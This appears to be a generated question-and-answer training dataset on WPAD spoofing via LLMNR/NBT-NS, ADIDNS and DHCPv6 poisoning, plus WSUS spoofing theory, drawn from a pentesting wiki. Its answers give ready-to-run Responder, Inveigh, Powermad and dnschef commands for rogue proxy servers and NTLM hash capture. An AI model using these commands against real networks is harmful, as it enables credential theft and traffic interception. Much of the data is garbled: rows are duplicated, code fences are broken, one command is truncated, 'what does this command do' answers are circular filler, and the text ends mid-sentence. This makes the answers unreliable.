"system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of WPAD spoofing - through LLMNR, NBT-NS spoofing", "response": "On old Windows systems (i.e. lacking the MS16-077 security update), the WPAD location could be obtained through insecure name resolution protocols like LLMNR and NBT-NS when standard DNS queries were failing (i.e. no DNS record for WPAD). This allowed attackers to operate LLMNR and NBT-NS spoofing to answer those WPAD queries and redirect to a fake wpad.dat file, hence poisoning the web proxy configuration of the requesting clients, hence obtaining more traffic.\n\nResponder (Python) and Inveigh (Powershell) are great tools for name poisoning. In addition to name poisoning, they also have the ability to start servers (listeners) that will capture authentications and echo the NTLM hashes to the attacker.\n\n::: tabs\n\n=== UNIX-like\n\nThe following command will start LLMNR, NBTS and mDNS spoofing. Name resolution queries for the wpad server will be answered just like any other query. Fake authentication servers (HTTP/S, SMB, SQL, FTP, IMAP, POP3, DNS, LDAP, ...) will capture NTLM hashes.\n\n* The -w/--wpad option will make Responder start the WPAD rogue server so that fake wpad.dat file can be served to requesting clients.\n* The -P/--ProxyAuth option to force the Windows client to authenticate after the wpad.dat is accessed and when the client starts using the proxy\n\n``bash\nresponder --interface \"eth0\" --wpad --ProxyAuth\nresponder -I \"eth0\" -wP\n`\n\n=== Windows\n\nThe following command will start LLMNR, NBTS and mDNS spoofing. Name resolution queries for the wpad server will be answered just like any other query. Fake authentication servers (HTTP/S, SMB, SQL, FTP, IMAP, POP3, DNS, LDAP, ...) will capture NTLM hashes (even from machine accounts) and set the Challenge to 1122334455667788 (to crack NTLM hashes with crack.sh).\n\n* Inveigh starts a WPAD rogue proxy server by default.\n* Options like -WPADAuth, -WPADAuthIgnore, -WPADIP, -WPADPort, -WPADResponse (and others) can be used to tweak the WPAD abuse.\n\n`\nInvoke-Inveigh -ConsoleOutput Y -LLMNR Y -NBNS Y -mDNS Y -Challenge 1122334", "metadata": {"corpus_index": 906, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/wpad-spoofing.md", "page_title": "WPAD spoofing", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for WPAD spoofing - through LLMNR, NBT-NS spoofing"}, {"role": "assistant", "content": "On old Windows systems (i.e. lacking the MS16-077 security update), the WPAD location could be obtained through insecure name resolution protocols like LLMNR and NBT-NS when standard DNS queries were failing (i.e. no DNS record for WPAD). This allowed attackers to operate LLMNR and NBT-NS spoofing to answer those WPAD queries and redirect to a fake wpad.dat file, hence poisoning the web proxy configuration of the requesting clients, hence obtaining more traffic.\n\nResponder (Python) and Inveigh (Powershell) are great tools for name poisoning. In addition to name poisoning, they also have the ability to start servers (listeners) that will capture authentications and echo the NTLM hashes to the attacker.\n\n::: tabs\n\n=== UNIX-like\n\nThe following command will start LLMNR, NBTS and mDNS spoofing. Name resolution queries for the wpad server will be answered just like any other query. Fake authentication servers (HTTP/S, SMB, SQL, FTP, IMAP, POP3, DNS, LDAP, ...) will capture NTLM hashes.\n\n* The -w/--wpad option will make Responder start the WPAD rogue server so that fake wpad.dat file can be served to requesting clients.\n* The -P/--ProxyAuth option to force the Windows client to authenticate after the wpad.dat is accessed and when the client starts using the proxy\n\n``bash\nresponder --interface \"eth0\" --wpad --ProxyAuth\nresponder -I \"eth0\" -wP\n`\n\n=== Windows\n\nThe following command will start LLMNR, NBTS and mDNS spoofing. Name resolution queries for the wpad server will be answered just like any other query. Fake authentication servers (HTTP/S, SMB, SQL, FTP, IMAP, POP3, DNS, LDAP, ...) will capture NTLM hashes (even from machine accounts) and set the Challenge to 1122334455667788 (to crack NTLM hashes with crack.sh).\n\n* Inveigh starts a WPAD rogue proxy server by default.\n* Options like -WPADAuth, -WPADAuthIgnore, -WPADIP, -WPADPort, -WPADResponse (and others) can be used to tweak the WPAD abuse.\n\n`\nInvoke-Inveigh -ConsoleOutput Y -LLMNR Y -NBNS Y -mDNS Y -Challenge 1122334"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for WPAD spoofing - through LLMNR, NBT-NS spoofing", "response": "On old Windows systems (i.e. lacking the MS16-077 security update), the WPAD location could be obtained through insecure name resolution protocols like LLMNR and NBT-NS when standard DNS queries were failing (i.e. no DNS record for WPAD). This allowed attackers to operate LLMNR and NBT-NS spoofing to answer those WPAD queries and redirect to a fake wpad.dat file, hence poisoning the web proxy configuration of the requesting clients, hence obtaining more traffic.\n\nResponder (Python) and Inveigh (Powershell) are great tools for name poisoning. In addition to name poisoning, they also have the ability to start servers (listeners) that will capture authentications and echo the NTLM hashes to the attacker.\n\n::: tabs\n\n=== UNIX-like\n\nThe following command will start LLMNR, NBTS and mDNS spoofing. Name resolution queries for the wpad server will be answered just like any other query. Fake authentication servers (HTTP/S, SMB, SQL, FTP, IMAP, POP3, DNS, LDAP, ...) will capture NTLM hashes.\n\n* The -w/--wpad option will make Responder start the WPAD rogue server so that fake wpad.dat file can be served to requesting clients.\n* The -P/--ProxyAuth option to force the Windows client to authenticate after the wpad.dat is accessed and when the client starts using the proxy\n\n``bash\nresponder --interface \"eth0\" --wpad --ProxyAuth\nresponder -I \"eth0\" -wP\n`\n\n=== Windows\n\nThe following command will start LLMNR, NBTS and mDNS spoofing. Name resolution queries for the wpad server will be answered just like any other query. Fake authentication servers (HTTP/S, SMB, SQL, FTP, IMAP, POP3, DNS, LDAP, ...) will capture NTLM hashes (even from machine accounts) and set the Challenge to 1122334455667788 (to crack NTLM hashes with crack.sh).\n\n* Inveigh starts a WPAD rogue proxy server by default.\n* Options like -WPADAuth, -WPADAuthIgnore, -WPADIP, -WPADPort, -WPADResponse (and others) can be used to tweak the WPAD abuse.\n\n`\nInvoke-Inveigh -ConsoleOutput Y -LLMNR Y -NBNS Y -mDNS Y -Challenge 1122334", "metadata": {"corpus_index": 906, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/wpad-spoofing.md", "page_title": "WPAD spoofing", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "What is the responder syntax for wpad spoofing - through llmnr, nbt-ns spoofing?"}, {"role": "assistant", "content": "responder --interface \"eth0\" --wpad --ProxyAuth\nresponder -I \"eth0\" -wP"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "What is the responder syntax for wpad spoofing - through llmnr, nbt-ns spoofing?", "response": "responder --interface \"eth0\" --wpad --ProxyAuth\nresponder -I \"eth0\" -wP", "metadata": {"corpus_index": 907, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/wpad-spoofing.md", "page_title": "WPAD spoofing", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "responder"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through WPAD spoofing - through LLMNR, NBT-NS spoofing"}, {"role": "assistant", "content": "responder --interface \"eth0\" --wpad --ProxyAuth\nresponder -I \"eth0\" -wP"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through WPAD spoofing - through LLMNR, NBT-NS spoofing", "response": "responder --interface \"eth0\" --wpad --ProxyAuth\nresponder -I \"eth0\" -wP", "metadata": {"corpus_index": 907, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/wpad-spoofing.md", "page_title": "WPAD spoofing", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `responder --interface \"eth0\" --wpad --ProxyAuth`?"}, {"role": "assistant", "content": "This command is used for wpad spoofing - through llmnr, nbt-ns spoofing. through LLMNR, NBT-NS spoofing"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `responder --interface \"eth0\" --wpad --ProxyAuth`?", "response": "This command is used for wpad spoofing - through llmnr, nbt-ns spoofing. through LLMNR, NBT-NS spoofing", "metadata": {"corpus_index": 907, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/wpad-spoofing.md", "page_title": "WPAD spoofing", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of WPAD spoofing - through ADIDNS spoofing"}, {"role": "assistant", "content": "On up-to-date machines (i.e. with the MS16-077 security update applied), WPAD can still be abused through ADIDNS spoofing if the WPAD record does not exist. There is however a DNS block list mitigation called GQBL (Global Query Block List) preventing names like WPAD and ISATAP (default entries) to be resolved. This block list exists to reduce vulnerabilities associated with dynamic DNS updates but it can be edited) when implementing WPAD)."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of WPAD spoofing - through ADIDNS spoofing", "response": "On up-to-date machines (i.e. with the MS16-077 security update applied), WPAD can still be abused through ADIDNS spoofing if the WPAD record does not exist. There is however a DNS block list mitigation called GQBL (Global Query Block List) preventing names like WPAD and ISATAP (default entries) to be resolved. This block list exists to reduce vulnerabilities associated with dynamic DNS updates but it can be edited) when implementing WPAD).", "metadata": {"corpus_index": 908, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/wpad-spoofing.md", "page_title": "WPAD spoofing", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for WPAD spoofing - through ADIDNS spoofing"}, {"role": "assistant", "content": "On up-to-date machines (i.e. with the MS16-077 security update applied), WPAD can still be abused through ADIDNS spoofing if the WPAD record does not exist. There is however a DNS block list mitigation called GQBL (Global Query Block List) preventing names like WPAD and ISATAP (default entries) to be resolved. This block list exists to reduce vulnerabilities associated with dynamic DNS updates but it can be edited) when implementing WPAD)."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for WPAD spoofing - through ADIDNS spoofing", "response": "On up-to-date machines (i.e. with the MS16-077 security update applied), WPAD can still be abused through ADIDNS spoofing if the WPAD record does not exist. There is however a DNS block list mitigation called GQBL (Global Query Block List) preventing names like WPAD and ISATAP (default entries) to be resolved. This block list exists to reduce vulnerabilities associated with dynamic DNS updates but it can be edited) when implementing WPAD).", "metadata": {"corpus_index": 908, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/wpad-spoofing.md", "page_title": "WPAD spoofing", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Tell me about WPAD spoofing - Pre CVE-2018-8320"}, {"role": "assistant", "content": "On machines that are not patched against CVE-2018-8320, there are two ways to bypass the GQBL: by registering a wildcard record or by registering a domain alias (DNAME) record, which can be conducted as follows with Powermad (Powershell).\n\n``bash\nNew-ADIDNSNode -Node '*' -Data 'Pentest_IP_Address'\nNew-ADIDNSNode -Node wpad -Type DNAME -Data 'pentester01.TARGETDOMAIN.LOCAL'\n``"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Tell me about WPAD spoofing - Pre CVE-2018-8320", "response": "On machines that are not patched against CVE-2018-8320, there are two ways to bypass the GQBL: by registering a wildcard record or by registering a domain alias (DNAME) record, which can be conducted as follows with Powermad (Powershell).\n\n``bash\nNew-ADIDNSNode -Node '*' -Data 'Pentest_IP_Address'\nNew-ADIDNSNode -Node wpad -Type DNAME -Data 'pentester01.TARGETDOMAIN.LOCAL'\n``", "metadata": {"corpus_index": 909, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/wpad-spoofing.md", "page_title": "WPAD spoofing", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on WPAD spoofing - Pre CVE-2018-8320"}, {"role": "assistant", "content": "On machines that are not patched against CVE-2018-8320, there are two ways to bypass the GQBL: by registering a wildcard record or by registering a domain alias (DNAME) record, which can be conducted as follows with Powermad (Powershell).\n\n``bash\nNew-ADIDNSNode -Node '*' -Data 'Pentest_IP_Address'\nNew-ADIDNSNode -Node wpad -Type DNAME -Data 'pentester01.TARGETDOMAIN.LOCAL'\n``"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on WPAD spoofing - Pre CVE-2018-8320", "response": "On machines that are not patched against CVE-2018-8320, there are two ways to bypass the GQBL: by registering a wildcard record or by registering a domain alias (DNAME) record, which can be conducted as follows with Powermad (Powershell).\n\n``bash\nNew-ADIDNSNode -Node '*' -Data 'Pentest_IP_Address'\nNew-ADIDNSNode -Node wpad -Type DNAME -Data 'pentester01.TARGETDOMAIN.LOCAL'\n``", "metadata": {"corpus_index": 909, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/wpad-spoofing.md", "page_title": "WPAD spoofing", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Give me the New-ADIDNSNode command to wpad spoofing - pre cve-2018-8320"}, {"role": "assistant", "content": "New-ADIDNSNode -Node '*' -Data 'Pentest_IP_Address'\nNew-ADIDNSNode -Node wpad -Type DNAME -Data 'pentester01.TARGETDOMAIN.LOCAL'"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Give me the New-ADIDNSNode command to wpad spoofing - pre cve-2018-8320", "response": "New-ADIDNSNode -Node '*' -Data 'Pentest_IP_Address'\nNew-ADIDNSNode -Node wpad -Type DNAME -Data 'pentester01.TARGETDOMAIN.LOCAL'", "metadata": {"corpus_index": 910, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/wpad-spoofing.md", "page_title": "WPAD spoofing", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "New-ADIDNSNode"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on WPAD spoofing - Pre CVE-2018-8320"}, {"role": "assistant", "content": "New-ADIDNSNode -Node '*' -Data 'Pentest_IP_Address'\nNew-ADIDNSNode -Node wpad -Type DNAME -Data 'pentester01.TARGETDOMAIN.LOCAL'"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on WPAD spoofing - Pre CVE-2018-8320", "response": "New-ADIDNSNode -Node '*' -Data 'Pentest_IP_Address'\nNew-ADIDNSNode -Node wpad -Type DNAME -Data 'pentester01.TARGETDOMAIN.LOCAL'", "metadata": {"corpus_index": 910, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/wpad-spoofing.md", "page_title": "WPAD spoofing", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `New-ADIDNSNode -Node '*' -Data 'Pentest_IP_Address'`?"}, {"role": "assistant", "content": "This command is used for wpad spoofing - pre cve-2018-8320. Pre CVE-2018-8320"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `New-ADIDNSNode -Node '*' -Data 'Pentest_IP_Address'`?", "response": "This command is used for wpad spoofing - pre cve-2018-8320. Pre CVE-2018-8320", "metadata": {"corpus_index": 910, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/wpad-spoofing.md", "page_title": "WPAD spoofing", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does WPAD spoofing - Post CVE-2018-8320 work?"}, {"role": "assistant", "content": "On machines that are patched against that CVE, registering a name server (NS) record could still work.\n\n``bash\nNew-ADIDNSNode -Node wpad -Type NS -Data 'pentester01.TARGETDOMAIN.LOCAL'\n`\n\nIn order for the NS record technique to work, the tester has to have a DNS server running for DNS spoofing. This can easily be accomplished with dnschef (Python).\n\n`bash\ndnschef --fakeip 'Pentest_IP_Address' --interface 'Pentest_IP_Address' --port 53 --logfile dnschef.log\n``"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does WPAD spoofing - Post CVE-2018-8320 work?", "response": "On machines that are patched against that CVE, registering a name server (NS) record could still work.\n\n``bash\nNew-ADIDNSNode -Node wpad -Type NS -Data 'pentester01.TARGETDOMAIN.LOCAL'\n`\n\nIn order for the NS record technique to work, the tester has to have a DNS server running for DNS spoofing. This can easily be accomplished with dnschef (Python).\n\n`bash\ndnschef --fakeip 'Pentest_IP_Address' --interface 'Pentest_IP_Address' --port 53 --logfile dnschef.log\n``", "metadata": {"corpus_index": 911, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/wpad-spoofing.md", "page_title": "WPAD spoofing", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for WPAD spoofing - Post CVE-2018-8320?"}, {"role": "assistant", "content": "On machines that are patched against that CVE, registering a name server (NS) record could still work.\n\n``bash\nNew-ADIDNSNode -Node wpad -Type NS -Data 'pentester01.TARGETDOMAIN.LOCAL'\n`\n\nIn order for the NS record technique to work, the tester has to have a DNS server running for DNS spoofing. This can easily be accomplished with dnschef (Python).\n\n`bash\ndnschef --fakeip 'Pentest_IP_Address' --interface 'Pentest_IP_Address' --port 53 --logfile dnschef.log\n``"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for WPAD spoofing - Post CVE-2018-8320?", "response": "On machines that are patched against that CVE, registering a name server (NS) record could still work.\n\n``bash\nNew-ADIDNSNode -Node wpad -Type NS -Data 'pentester01.TARGETDOMAIN.LOCAL'\n`\n\nIn order for the NS record technique to work, the tester has to have a DNS server running for DNS spoofing. This can easily be accomplished with dnschef (Python).\n\n`bash\ndnschef --fakeip 'Pentest_IP_Address' --interface 'Pentest_IP_Address' --port 53 --logfile dnschef.log\n``", "metadata": {"corpus_index": 911, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/wpad-spoofing.md", "page_title": "WPAD spoofing", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Give me the New-ADIDNSNode command to wpad spoofing - post cve-2018-8320"}, {"role": "assistant", "content": "New-ADIDNSNode -Node wpad -Type NS -Data 'pentester01.TARGETDOMAIN.LOCAL'"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Give me the New-ADIDNSNode command to wpad spoofing - post cve-2018-8320", "response": "New-ADIDNSNode -Node wpad -Type NS -Data 'pentester01.TARGETDOMAIN.LOCAL'", "metadata": {"corpus_index": 912, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/wpad-spoofing.md", "page_title": "WPAD spoofing", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "New-ADIDNSNode"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out WPAD spoofing - Post CVE-2018-8320 during a pentest?"}, {"role": "assistant", "content": "New-ADIDNSNode -Node wpad -Type NS -Data 'pentester01.TARGETDOMAIN.LOCAL'"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out WPAD spoofing - Post CVE-2018-8320 during a pentest?", "response": "New-ADIDNSNode -Node wpad -Type NS -Data 'pentester01.TARGETDOMAIN.LOCAL'", "metadata": {"corpus_index": 912, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/wpad-spoofing.md", "page_title": "WPAD spoofing", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `New-ADIDNSNode -Node wpad -Type NS -Data 'pentester01.TARGETDOMAIN.LOCAL'`?"}, {"role": "assistant", "content": "This command is used for wpad spoofing - post cve-2018-8320. Post CVE-2018-8320"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `New-ADIDNSNode -Node wpad -Type NS -Data 'pentester01.TARGETDOMAIN.LOCAL'`?", "response": "This command is used for wpad spoofing - post cve-2018-8320. Post CVE-2018-8320", "metadata": {"corpus_index": 912, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/wpad-spoofing.md", "page_title": "WPAD spoofing", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does WPAD spoofing - through DHCPv6 spoofing work?"}, {"role": "assistant", "content": "On up-to-date machines (i.e. with the MS16-077 security update applied), WPAD can still be abused through ADIDNS spoofing, even if the WPAD record does exist. With DNS poisoning through DHCPv6 spoofing, an attacker can reply to DHCPv6 requests, and then reply to DNS queries.\n\nThis attack can be conducted with mitm6 (Python), see the DHCPv6 spoofing page for exploitation notes."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does WPAD spoofing - through DHCPv6 spoofing work?", "response": "On up-to-date machines (i.e. with the MS16-077 security update applied), WPAD can still be abused through ADIDNS spoofing, even if the WPAD record does exist. With DNS poisoning through DHCPv6 spoofing, an attacker can reply to DHCPv6 requests, and then reply to DNS queries.\n\nThis attack can be conducted with mitm6 (Python), see the DHCPv6 spoofing page for exploitation notes.", "metadata": {"corpus_index": 913, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/wpad-spoofing.md", "page_title": "WPAD spoofing", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do WPAD spoofing - through DHCPv6 spoofing"}, {"role": "assistant", "content": "On up-to-date machines (i.e. with the MS16-077 security update applied), WPAD can still be abused through ADIDNS spoofing, even if the WPAD record does exist. With DNS poisoning through DHCPv6 spoofing, an attacker can reply to DHCPv6 requests, and then reply to DNS queries.\n\nThis attack can be conducted with mitm6 (Python), see the DHCPv6 spoofing page for exploitation notes."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do WPAD spoofing - through DHCPv6 spoofing", "response": "On up-to-date machines (i.e. with the MS16-077 security update applied), WPAD can still be abused through ADIDNS spoofing, even if the WPAD record does exist. With DNS poisoning through DHCPv6 spoofing, an attacker can reply to DHCPv6 requests, and then reply to DNS queries.\n\nThis attack can be conducted with mitm6 (Python), see the DHCPv6 spoofing page for exploitation notes.", "metadata": {"corpus_index": 913, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/wpad-spoofing.md", "page_title": "WPAD spoofing", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of WSUS spoofing - Theory"}, {"role": "assistant", "content": "WSUS (Windows Server Update Services) allow administrators to centralize the management and deployment of Windows updates within their organization network. When first configuring this set of services, the default configuration makes the WSUS use HTTP without any secure layer like SSL/TLS. HTTPS is not enforced by default.\n\nWhen pulling an update from the WSUS server, clients are redirected to the executable file to download and execute (which can only be a binary signed by Microsoft) and obtain a handler named CommandLineInstallation that specifies the additional parameters to pass the binary during the update installation. Without HTTPS, the WSUS is vulnerable to Man-in-the-Middle attacks where adversaries can either pose as the update server and send malicious updates or intercept and modify updates sent to the clients."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of WSUS spoofing - Theory", "response": "WSUS (Windows Server Update Services) allow administrators to centralize the management and deployment of Windows updates within their organization network. When first configuring this set of services, the default configuration makes the WSUS use HTTP without any secure layer like SSL/TLS. HTTPS is not enforced by default.\n\nWhen pulling an update from the WSUS server, clients are redirected to the executable file to download and execute (which can only be a binary signed by Microsoft) and obtain a handler named CommandLineInstallation that specifies the additional parameters to pass the binary during the update installation. Without HTTPS, the WSUS is vulnerable to Man-in-the-Middle attacks where adversaries can either pose as the update server and send malicious updates or intercept and modify updates sent to the clients.", "metadata": {"corpus_index": 914, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/wsus-spoofing.md", "page_title": "WSUS spoofing", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through WSUS spoofing - Theory"}, {"role": "assistant", "content": "WSUS (Windows Server Update Services) allow administrators to centralize the management and deployment of Windows updates within their organization network. When first configuring this set of services, the default configuration makes the WSUS use HTTP without any secure layer like SSL/TLS. HTTPS is not enforced by default.\n\nWhen pulling an update from the WSUS server, clients are redirected to the executable file to download and execute (which can only be a binary signed by Microsoft) and obtain a handler named CommandLineInstallation that specifies the additional parameters to pass the binary during the update installation. Without HTTPS, the WSUS is vulnerable to Man-in-the-Middle attacks where adversaries can either pose as the update server and send malicious updates or intercept and modify updates sent to the clients."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through WSUS spoofing - Theory", "response": "WSUS (Windows Server Update Services) allow administrators to centralize the management and deployment of Windows updates within their organization network. When first configuring this set of services, the default configuration makes the WSUS use HTTP without any secure layer like SSL/TLS. HTTPS is not enforced by default.\n\nWhen pulling an update from the WSUS server, clients are redirected to the executable file to download and execute (which can only be a binary signed by Microsoft) and obtain a handler named CommandLineInstallation that specifies the additional parameters to pass the binary during the update installation. Without HTTPS, the WSUS is vulnerable to Man-in-the-Middle attacks where adversaries can either pose as the update server and send malicious updates 